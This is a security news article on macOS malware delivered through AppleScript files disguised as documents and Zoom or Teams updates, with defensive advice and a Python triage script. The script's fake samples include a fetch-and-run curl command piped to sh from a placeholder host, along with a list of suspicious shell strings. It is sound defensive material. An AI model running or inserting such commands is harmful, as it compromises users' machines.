Categories: Cyber Security News

Hackers Abuse AppleScript to Deliver macOS Malware Masquerading as Zoom and Teams Updates

Researchers are tracking an uptick in macOS malware campaigns abusing AppleScript (.scpt) files to deliver stealers and fake update installers disguised as legitimate office documents or Zoom and Microsoft Teams updates.

The technique, once associated with APT operations targeting macOS, is now being repurposed by commodity malware families such as MacSync and Odyssey Stealer.

Following Apple’s August 2024 removal of the “right-click and open” Gatekeeper bypass, threat actors have experimented with new user-interaction methods to execute malicious code.

Traditional infection chains often relied on fake Homebrew installers or DMGs that instructed users to drag items into Terminal. Now, attackers are turning to .scpt AppleScript files to reinstate social engineering-based triggers that evade built-in protections.

Malicious .scpt Files Disguised as Documents and Installers

By default, double-clicking a .scpt file opens it in Script Editor.app rather than running it. Attackers exploit this by placing innocent-looking comments at the top of the script, followed by a long run of blank lines, so that the actual malicious code sits below the visible area of the editor window.

The visible comments then instruct the victim to click the Run button or press Command + R, which executes the entire script, including payload-delivery commands such as “do shell script” calls that run curl requests against remote servers.

Fake Chrome Update Example

Recent samples include fake documents like Apeiron_Token_Transfer_Proposal.docx.scpt and Stable1_Investment_Proposal.pptx.scpt, as well as fraudulent update scripts such as Zoom_SDK_Update.scpt, MSTeamsUpdate.scpt, and InstallSoftZone.scpt.

These variants often carry custom icons embedded in the file’s resource fork, making them appear identical to genuine Office files or software installers when unzipped or mounted from a DMG.

Analysis of these samples reveals typical behaviors, such as fetching secondary payloads, executing hidden shell commands, or, as in the sample 888.scpt, dropping additional malicious DMGs.

Some obfuscated versions break payload strings into multiple AppleScript variables before reassembling them, mimicking PowerShell-style evasion seen on Windows systems.

Detection and Defense

Malware detection through traditional antivirus software remains inconsistent, with several live samples showing zero detections on VirusTotal.

Security researchers recommend that defenders monitor process executions launched by Script Editor.app and flag any network activity or child processes triggered by AppleScript files. File events for names that carry a document extension immediately before a script extension, such as .docx.scpt or .pptx.scpt, should be treated as suspicious.


Mitigation steps include changing the default handler for .scpt and .applescript files to a plain text editor such as TextEdit, so that double-clicking shows the source without offering a Run button and accidental execution is prevented.

Additionally, custom endpoint detection rules can look for the AppleEvent code that “do shell script” compiles to (“sysoexec”) inside compiled .scpt files, or track Terminal- and shell-related launch anomalies on macOS endpoints.
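The following triage script is an added example written for this article, not code from the researchers or from any vendor tool. It combines the two detection ideas above: the double-extension naming pattern (for example .docx.scpt) and the “sysoexec” event code that “do shell script” compiles to inside a .scpt binary. The “FasdUAS” header and “sysoexec” marker are well-known properties of compiled AppleScript; the list of suspicious strings, the scoring thresholds, and the sample file contents are assumptions constructed for the example and are not real malware samples.

```python
import re

# Well-known markers in compiled AppleScript (.scpt) binaries:
# "FasdUAS" is the file header, "sysoexec" is the AppleEvent class/id pair
# that 'do shell script' compiles to.
APPLESCRIPT_MAGIC = b"FasdUAS"
SHELL_EVENT = b"sysoexec"

# Assumed: strings worth flagging when they appear next to shell execution.
SUSPICIOUS_STRINGS = (b"curl ", b"osascript", b"hdiutil", b"base64", b"chmod +x", b"/tmp/")

SCRIPT_EXTS = (".scpt", ".applescript")
# A document/installer extension directly followed by a script extension,
# e.g. Proposal.docx.scpt or Update.dmg.scpt
DOUBLE_EXT = re.compile(r"\.(docx?|pptx?|xlsx?|pdf|dmg|pkg)\.(scpt|applescript)$", re.I)
# Assumed lure vocabulary for fake updaters/installers.
UPDATE_LURE = re.compile(r"(update|install|setup|upgrade)", re.I)


def filename_indicators(name: str) -> list[str]:
    """Indicators derived from the file name alone."""
    hits: list[str] = []
    if not name.lower().endswith(SCRIPT_EXTS):
        return hits
    hits.append("applescript-extension")
    if DOUBLE_EXT.search(name):
        hits.append("double-extension")
    if UPDATE_LURE.search(name):
        hits.append("update-lure-name")
    return hits


def content_indicators(data: bytes) -> list[str]:
    """Indicators derived from the raw bytes of a compiled script."""
    hits: list[str] = []
    if not data.startswith(APPLESCRIPT_MAGIC):
        return hits  # not a compiled AppleScript; nothing to say about it here
    hits.append("compiled-applescript")
    if SHELL_EVENT in data:
        hits.append("do-shell-script")
        # Only bother with string hunting once we know the script shells out.
        for s in SUSPICIOUS_STRINGS:
            if s in data:
                hits.append("string:" + s.decode().strip())
    return hits


def triage(name: str, data: bytes) -> dict:
    """Assumed scoring: double extension counts 2, lure name 1, shell
    execution 1, and each suspicious string 1. Score >= 2 is suspicious."""
    hits = filename_indicators(name) + content_indicators(data)
    score = 0
    score += 2 if "double-extension" in hits else 0
    score += 1 if "update-lure-name" in hits else 0
    score += 1 if "do-shell-script" in hits else 0
    score += sum(1 for h in hits if h.startswith("string:"))
    verdict = "suspicious" if score >= 2 else "benign"
    return {"name": name, "indicators": hits, "score": score, "verdict": verdict}


# Constructed sample contents (not real samples): the names follow the
# article, the bytes only imitate the markers a compiled script would carry.
SAMPLES = {
    "Apeiron_Token_Transfer_Proposal.docx.scpt":
        b"FasdUAS 1.101.10\x00" + b"\x00" * 16 + b"sysoexec"
        + b"curl -fsSL https://payload.example.invalid/p | sh",
    "Zoom_SDK_Update.scpt":
        b"FasdUAS 1.101.10\x00sysoexechdiutil attach /tmp/update.dmg",
    # Benign automation: only a 'display dialog' (sysodlog), no shell.
    "rename_photos.scpt":
        b"FasdUAS 1.101.10\x00sysodlogdisplay dialog \"done\"",
    # A genuine .docx is a zip archive, so it never looks like a script.
    "report.docx": b"PK\x03\x04" + b"\x00" * 8,
}


def run_triage() -> list[dict]:
    return [triage(name, data) for name, data in SAMPLES.items()]


if __name__ == "__main__":
    for result in run_triage():
        print(f"{result['verdict']:<10} score={result['score']} {result['name']}: {result['indicators']}")
```

In a real deployment the same two checks map onto file-event telemetry (new .scpt files whose names match DOUBLE_EXT) and onto a YARA rule keyed on the FasdUAS header plus the sysoexec marker; the scoring here is deliberately simple so that a legitimate automation script that merely shells out is not flagged on its own.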

As macOS threat actors continue to recycle enterprise-grade APT techniques, the rise of AppleScript-based infections signals a growing convergence between scripting abuse and social engineering on Apple systems.


The post Hackers Abuse AppleScript to Deliver macOS Malware Masquerading as Zoom and Teams Updates appeared first on Cyber Security News.
